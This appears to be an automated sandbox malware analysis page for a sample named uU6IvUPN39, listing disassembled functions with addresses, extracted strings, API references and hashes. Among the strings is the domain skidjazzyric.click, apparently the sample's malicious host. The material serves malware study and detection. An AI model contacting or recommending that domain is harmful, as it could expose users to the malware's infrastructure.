String ID: {wBy$?;;
API String ID: 0-3800777323
Opcode ID: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
Opcode Fuzzy Hash: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A

Function 00431E8E Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

nz, xrefs: 00432051
nz, xrefs: 0043204A

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: nz$nz
API String ID: 0-4002586851
Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction ID: a3c1cfee1f99e453375e064e447a228442ae2f14524e15aa7be5cf63e3ec65e5
Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction Fuzzy Hash: ACE11872608B808FD315CA3CC891396FFE2AFDA314F1D866DC5EA8B392D675A406C715

Function 021620F5 Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

nz, xrefs: 021622B8
nz, xrefs: 021622B1

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: nz$nz
API String ID: 0-4002586851
Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction ID: b96d90d77959f889999b0537ed4d75a76dec3588928b7040a84930a765161454
Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction Fuzzy Hash: 99E1E872608B808FD315CA3CC8953A6BFE2AFDA310F1D866DC5EA8B396D775A405C711

Function 0040DFE2 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0040E295
skidjazzyric.click, xrefs: 0040E33F

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: UXY^$skidjazzyric.click
API String ID: 0-1204630608
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95

Function 0213E249 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

skidjazzyric.click, xrefs: 0213E5A6
UXY^, xrefs: 0213E4FC

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: UXY^$skidjazzyric.click
API String ID: 0-1204630608
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: 18482736283a343f1fb0fa3b1a6ff59a28e1ae85c8f36d2362c786941b6fe2e3
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: C79124B5604B818FD315CF29C990662FBA2FF96310B19869CC0D28FB56C779E806CF95

Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

yr, xrefs: 004275CE
o~, xrefs: 004275E6

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786

Function 021576F7 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

yr, xrefs: 02157835
o~, xrefs: 0215784D

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction ID: 85bcade867c6439ad62c42de966f5e9959bccdd9b7a8c2c0fa0c535c0d162477
Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction Fuzzy Hash: 0F910376948360CBD320DF19C845A6BF7E2EFC5324F09896CE9D95B390E7B48506C786

Function 02172F87 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

NMNO, xrefs: 02173087
D`a&, xrefs: 0217313C

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: D`a&$NMNO
API String ID: 0-4143563191
Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction ID: 8711074b621ce6d33ea7818a800bb37f985eb24be711e7c8b93670b22d69b59e
Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction Fuzzy Hash: 4A8145312483459FD318DF28CC81A6BB7B2EFC5328F29C66CE5A547391DB32980A8751

Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 00428375
:7$%, xrefs: 004282F6, 004282C5

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82

Function 021584E7 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 0215852C, 0215855D
:7$%, xrefs: 021585DC

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction ID: 0b1ea415e5d89c5fc13626f38f01feea219ca3ee6d4e6243662c470e307adb95
Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction Fuzzy Hash: 4A21B0711183908BD7089F79C964B6FFBE5BB86318F145A2CE1E287291DBB4C409CB82

Function 0213AC99 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

MO, xrefs: 0213AC9E
MO, xrefs: 0213AC36

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: ada7f03b6c50977aac26abb729b58cc350a43aeaf28de1ebc885b32ed1e0ca40
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: C111AC741442818BEF158FA8DD91667BFA0EF42220F1499D8DC855F38BC738C502CF64

Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 0044049C
7&'$, xrefs: 00440445

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C

Function 02170694 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 02170703
7&'$, xrefs: 021706AC

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: efdb607a1660d8ffcbe142d58d6c96736b9a459e32251f01f438a566d8a283ef
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 93F068745545944BDB918F3D98A96BE67F0E757214F202AB5C65AE32A2C731C4818F08

Function 0041194F Relevance: 2.2, APIs: 1, Instructions: 666COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00411D64

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
Instruction ID: a8cfc5bf14821c73dd49e5f1522f5c4ec20a02328b59693b871348f0b0df5eb8
Opcode Fuzzy Hash: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
Instruction Fuzzy Hash: E4420A71A04B408FD714DF38D9813A6BBE1AF95314F188A3ED5EB8B3D2D639A446C706

Function 0043CD27 Relevance: 2.0, Strings: 1, Instructions: 747COMMON

Download Yara Rule

Strings

/p, xrefs: 0043D2AD

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: /p
API String ID: 0-62938030
Opcode ID: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
Instruction ID: ba8b9978e2f20e60afdbbdaba48a15688935c3ff76d45a9363d37c1b9ca99bef
Opcode Fuzzy Hash: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
Instruction Fuzzy Hash: 7C32003AA18351CBD7049F39D81226BB7E1FF9A320F19887ED8C183291E779C955C786

Function 02147AE4 Relevance: 1.8, APIs: 1, Instructions: 334COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02147E61

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction ID: 3a460a3d24a496891c07117d74410d13a97f433dd945fac061e5922fc237dd37
Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction Fuzzy Hash: 1EB103729587218BC314CF28C4917AAF7F2FFD9314F19962CE8C95B294E7349902C795

Function 02147FFA Relevance: 1.8, APIs: 1, Instructions: 263COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 021482CF

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
Instruction ID: 0e7401a5a8db240485299e8b60410263531a1f8e390c8874f1348c6c67633bcb
Opcode Fuzzy Hash: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
Instruction Fuzzy Hash: 3A91EE755083118BC728CF28C89176BB7E1FFC8714F0A8A5DE8C99B254EB389941CB46

Function 00437B69 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00437C90

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction ID: c3200330e68ce6aff19a63fed1a4000c560c1f69ed3aeb6105e6dfa3e47a6751
Opcode Fuzzy Hash: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction Fuzzy Hash: 9C91C3B1E042548FCB18CF6CC89179EBBF2AF89310F2982ADD855AB391D7759C01CB91

Function 00432426 Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

J, xrefs: 0043249F

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction ID: fda16036ad69fd6001319f3414ba3134900024cf57a0a68240a2308677c6b07d
Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction Fuzzy Hash: 82127D71609AC18FE3158B38C591392BFE1AB66304F1CC9AEC4EACB387D63AD5068755

Function 0216268D Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

J, xrefs: 02162706

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction ID: d09dfe0080e912f47267e4aa1547875a1d0c84c588d92a0f9ed0156a713d7571
Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction Fuzzy Hash: FB127D75609AC18FE3158B38C895392BFE1AB66304F1CC9ADC4EACB387D63AD506C751

Function 004374AB Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 004375CB

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction ID: 45239876aaa66c970168bcac432cbab02119562676560ecae2c3189c67bbcca7
Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction Fuzzy Hash: 6571C7B1E046508FC718CF6CC851359BFF2AB99314F2982ADD8999F3D2D6759C06CB81

Function 02167712 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 02167832

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction ID: 50592425da8aaf6e3f04d998afa7d1c43289a2446ba810fe5000e7386c3f021d
Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction Fuzzy Hash: AB71A4B1E046508FC718CF6CC855369BFE2AB85314F2982ADD8999B3D2D7759806CB81

Function 00435D13 Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00435DB9

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction ID: f2a30e19a756ef2febaf58aa14edd62971e43cb539abc4116fa3d4166735a6c9
Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction Fuzzy Hash: 51913A21208BC28ED3268B3C88486157F915B67228F2C87DCE0FA8F7E7C6568107C366

Function 02165F7A Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02166020

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction ID: 2dd1a3e1bcfc0e7b93ee3318f9d1567f3827c7a38f5489ff2753a0a664db54cb
Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction Fuzzy Hash: AF912B11208BC28ED7268B3C88586157F915B67228B2D87DCD0FA8F7E7C7578507C366

Function 0043443D Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004344E1

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction ID: 615ca32909d59e4e98a0e547278d02967b49bf7f3b148c397c41720c4b96474d
Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction Fuzzy Hash: EB912C11208BC28EC326CA3C88586557F921BA7228F2D87DDD0FA8F7D7C7669507C766

Function 021646A4 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02164748

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction ID: 465914559ddae43176014936784d47272b76c5c417137d6c3f74d1ad3517bf54
Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction Fuzzy Hash: 64912B21208BC28EC326CA3C88586557F921B67228B2D87DCD0FA8F7D7C7669107C766

Function 00422380 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 004223AC

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A

Function 021525E7 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 02152613

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction ID: 40b7f0c4348e8ee57831009a55ec03eab04ed3cd9f0f5e81fd7f5fa39966f6bf
Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction Fuzzy Hash: E5A1D572A85360DBD7219F24CC8176BB3E1EF81324F0985A8ECA59B281E379ED45C752

Function 0043C5A0 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043C7C0

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799

Function 0216C807 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0216CA27

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction ID: 2874c05eb2645546466a1e2e0f9aebc2bc4a1bd1d1149d45520b963e27f06cb5
Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction Fuzzy Hash: E4A148726843209BD724CF29C88DB3FB3A6EBC5728F19862DE8D557290D731A811CBD1

Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0041C360, 0041C364

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A

Function 0214C148 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0214C5C7, 0214C5CB

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
